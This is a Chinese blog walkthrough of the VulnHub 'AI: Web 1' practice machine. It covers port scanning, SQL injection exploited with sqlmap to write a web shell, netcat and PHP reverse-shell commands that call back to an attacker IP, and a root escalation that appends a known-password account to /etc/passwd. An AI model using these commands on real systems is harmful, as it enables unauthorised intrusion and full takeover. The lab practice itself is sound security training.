Vulnhub_WEB1靶机渗透测试

最新推荐文章于 2024-11-12 23:07:13 发布
最新推荐文章于 2024-11-12 23:07:13 发布
阅读量119 收藏
点赞数 1
分类专栏: Vulnhub渗透测试靶场 文章标签: 网络 linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/133072842
版权

WEB:1

AI: Web: 1 ~ VulnHub

该框旨在测试渗透测试人员的技能。目标很简单。从 /root/flag.txt 获取标志。 枚举框,获取低特权 shell,然后将权限升级到根

文章目录

信息收集

  1. 使用nmap对网段和目标主机进行扫描 nmap -sT -sV -O 192.168.78.152

web渗透

  1. 发现目标主机只开放了80端口,只有网站可以进行渗透,而且存在robots.txt文件,对其进行访问
  2. 发现两个目录都被禁止访问了,可能都缺少权限吧
  3. 再使用dirb对se3re目录进行扫描,发现了存在index.php文件,访问该目录发现了提交框

image-20230620224700375

  1. 提交1发现似乎是存在SQL注入漏洞,对其变量类型进行测试发现是字符型注入

    image-20230620225055942

    image-20230620224942536

image-20230620224856535

  1. 接下来就直接使用sqlmap对SQL注入进行利用了,测试了一下没有过滤命令,抓包将数据包保存为web1.txt,毕竟是post参数。post的值写入到–data中

image-20230620225115545

image-20230620225122269

  1. 发现sqlmap可以成功跑下来,对数据库内容进行查看没有发现什么有用信息,毕竟没有登录的界面,也没有开放ssh。但是想到联合注入是可以进行写shell的。直接使用payload获取shellpython sqlmap.py -r test/web1.txt --data "uid=" -level 3 --os-shell 获取shell的level等级必须大于3

image-20230620225340715

  1. 填写一些主要的参数,shell的语言类型,2,上传的路径地址三个条件

image-20230620225533915

  1. 返回了shell框,输入id发现成功获取了shell

image-20230620225638550

  1. 访问产生的shell文件地址,发现是一个提交框,可以上传自己本地的木马,那就不客气了,进行文件上传 这是sqlmap生成的文件提交框

image-20230620225719836

  1. 使用蚁剑连接该目录,成功获取了权限

image-20230620225818865

  1. 另外还可以直接写shell文件到目标主机的目录中payload为 python sqlmap.py -u "http://192.168.78.152/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write "E:\Web\oneword.php" --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

image-20230620225910922

image-20230620225916615

  1. 使用蚁剑测试链接效果
image-20230621144248248

获取shell

  1. 打开蚁剑的虚拟终端,将shell反弹到虚拟机上

  2. 挣扎了半天能使用的都尝试了,失败告终 rm /tmp/f;mkfifo/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.78.145 7878 >/tmp/f

  3. 最终使用php代码执行获取了shell权限

<?php
$sock=fsockopen("192.168.78.145",7878);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

image-20230621151408277

image-20230621151402893

image-20230621151324286

权限提升

  1. 没什么思路,没有ssh服务,所以不会有ssh登录的可能,find查找suid提权也没有,sudo -l也没信息
  2. 通过了解得知类似于DC-9靶机的对/etc/passwd写入账号密码来进行提权。查看一下passwd的权限,发现竟然是web权限就可以编译。那看来就是创建root账号密码了

image-20230621153129773

  1. 查看了一下suoders的权限,发现只能是root用户,所以不能直接写入用户名和权限了

image-20230621153348658

  1. 用openssl生成用户,用户名为hacker密码123456 openssl passwd -1 -salt hacker 123456 $1$hacker$6luIRwdGpBvXdP.GMwcZp/

image-20230621154740941

  1. 现在就要了解一下passwd文件下保存的账号密码的格式了
用户名:密码:UID(用户ID):GID(组ID):描述性信息:主目录:默认Shell hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash

  1. 使用echo 格式 >> /etc/passwd文件中。 命令为echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd

  2. 查看passwd写入的账号密码信息

image-20230621154913966

  1. 切换到hacker用户 su - hacker

image-20230621154951300

  1. 来到root目录下查看flag文件

image-20230621155009055

总结

  1. 了解了使用sqlmap获取shell和上传shell的操作 需要联合注入的条件下
  2. 扫描出来的目录都没有权限查看,一定还有隐藏的目录可以查看,可以尝试回退一级来查看,或者使用dirb再来对每个能访问的目录进行扫描
  3. 反弹shell的方式很多,nc bash不行,可以直接执行php或者python代码写的反弹shell文件
  4. 没有ssh连接,也没有suid提权,可以去看看sudo -l 和 /etc/passwd,/etc/sudoers文件的权限,查看是否可以写入来获取root权限
Vulnhub_Ganana靶机渗透测试
m0_66225311的博客
09-23 287
靶机开始前和开始后真属实是一波三折,头都大了靶机的渗透更是一波三折,确实够难够复杂,目录扫描得到了很多的目录,其实发现每一个都没多少用处,只有secret比较关键端口扫描得到的6777ftp服务是可以进行匿名登录的,但是登录后发现只有一条欢迎语,可以说是噩梦开始的地方了破局的关键是使用dirb扫描得到tasks目录,里面提示到了用户名(文件名)和藏着账户密码的。
Vulnhub_driftingblues1靶机渗透测试
m0_66225311的博客
10-06 182
本次靶机进行了域名渗透操作,进行了子域名爆破,提权时隐藏了定时任务的信息根据网页提示说和host文件有关系,接触到host就要想到ip和域名对应,既然涉及到域名那就少不了子域名爆破了,信息就隐藏在子域名网页中。还要讲子域名添加到hosts文件中。子域名爆破的工具有很多,这里使用的是layer和ffuf再进行后渗透时,发现存在脚本需要使用root权限执行即可进行权限提升的利用,那多半就可能是定时任务来执行的,本次靶机就将定时任务的信息隐藏了,但是可以使用pspy64工具查看得知存在定时任务。
vulnhub_Inferno靶机渗透测试
m0_66225311的博客
10-10 224
本次靶机还挺不错,碰到了一些新的内容,也学到了一些知识前期就是常规的web渗透,扫目录信息信息收集操作。gobuster的扫描结果还是比较全的,毕竟能指定密码本和文件后缀等内容新内容就是那个登录验证的功能了,在获取权限的时候,要使用到验证后的界面,需要在url上添加http://用户名:密码@地址,因为该验证是GET传递,所以可以直接写在url上进行验证对于模块框架没有很好的攻击思路时候,可以查看一下模块框架的名称,搜索一下是否有一些历史漏洞,利用POC进行攻击提权也了解到需要对隐藏文件。
vulnhub——Ai-Web1靶机渗透
qq_63034068的博客
07-20 1014
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns #列出字段。sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables #列出表。我们再去扫一下另一个路径,我们看到了一个php文件。
Vulnhub_DC-4靶机渗透测试
m0_66225311的博客
09-20 155
远古靶机,增加了另外一种使用密码字典切换用户,使用sudo权限提权方法,也是原本提权路线,之前用exim4直接suid提权走了捷径了。本次的DC-4靶机感觉难度挺简单,至少是第一次直接从靶机打到了提权部分,因为exim4漏洞POC有使用过,直接提权上到root。在进行常规提权的时候查看了一下邮件信息的文件 找到了隐藏密码暴力破解登录网站shell命令执行直接反弹shell到kali上find 发现exim4提权POC suid提权
vulnhub靶场】VulnHub2018_DeRPnStiNK靶机提权
qq_46421742的博客
07-27 397
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Vulnhub_Corrosion2靶机渗透测试
m0_66225311的博客
09-17 246
靶机难度感觉不算大,查看好靶机给的提示,枚举是关键,在爆破压缩包,爆破randy用户密码的时候都有用到新版本的框架,多半已经修复了之前的漏洞,登陆到后台后先查看一下版本信息,搜索一下当前版本是否有漏洞收集好发现的的账号密码,一些提示性的界面,都会有所帮助本次提权使用到的是polkit提权,执行命令调用helper来执行/bin/bash获得root权限。
Vulnhub_Grotesque 1.0.1靶机渗透测试
m0_66225311的博客
09-19 192
查看网站上醒目的标识,可能会有不小的收获有着很多相同文件内容的文件夹,要怀疑其中就有隐藏内容的文件,按照占内存大小排序,可能会发现第一个文件中隐藏着某些信息这个把歌词转换成md5值的操作可以说很脑洞了md5sum,应该是要和注释的图片联系起来,毕竟人名一样wordpress后台getshellcms框架的网站,配置文件中会有着数据库的账号和密码,可能也是本机的用户加深了对于.kdbx文件的解密和查看。
Vulnhub_Mr-Root靶机渗透测试
m0_66225311的博客
09-08 120
Vulnhub_Mr-Root靶机渗透测试
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1461
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2337
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)
m0_68117643的博客
08-01 1910
靶机(stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
vulnhub-SolidState: 1靶机渗透测试
m0_68117643的博客
07-05 953
vulnhub-SolidState: 1靶机渗透测试
Vulnhub-Bulldog1 靶机渗透
Majula
02-01 605
WalkthroughDownloadDescriptionPen TestingScanningExploitationPrivilege EscalationSolution ISolution IIReview Download BULLDOG: 1 - VlunHub VM 镜像文件。 这里 VM 我导入配置失败,分配不了 IP,建议用 VirtualBox,因为靶机默认模式是桥接,攻击机也要设为桥接模式。 我是 VM 运行 Kali,VirtualBox 运行靶机,如果你是这种情况,为了更加直观,
字节序(Byte Order)
weixin_50993868的博客
11-11 177
字节序与平台字节序转换字节序(Byte Order)是指数据在内存中存储时字节的排列顺序。由于不同的计算机体系结构可能采用不同的字节序,因此理解字节序非常重要,特别是在处理多平台数据传输或存储时。
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 178
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
UNIX 域套接字
weixin_50993868的博客
11-12 191
UNIX 域套接字(UNIX Domain Socket,简称 UDS)是一种在同一台机器上的进程间通信(IPC,Inter-Process Communication)机制,允许不同的进程通过文件系统中的特殊文件进行数据交换,而不需要通过网络协议栈。这使得 UNIX 域套接字在本地通信中比传统的 TCP/IP 套接字更高效。流式数据:和 TCP 套接字类似,UNIX 域套接字也支持面向流的通信(SOCK_STREAM),以及无连接的报文通信(SOCK_DGRAM)。// 套接字文件的路径。
Linux网络编程3
最新发布
m0_73839343的博客
11-12 349
该数组里列出这个进程打开的所有文件的文件描述符。数组的下标是文件描述符,是一个整数,而数组的内容是一个指针,指向内核中所有打开的文件的列表,也就是说内核可以通过文件描述符找到对应打开的文件。然后每个文件都有一个inode,Socket 文件的 inode指向了内核中的Socket 结构,在这个结构体里有两个队列,分别是发送队列和接收队列,这个两个队列里面保存的是一个个struct sk_buff,用链表的组织形式串起来。在TCP通信的过程,服务器端会产生两类不同的文件描述符,一个是监听的文件描述符;
Linux网络协议socket
Au_ust的博客
11-05 1280
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值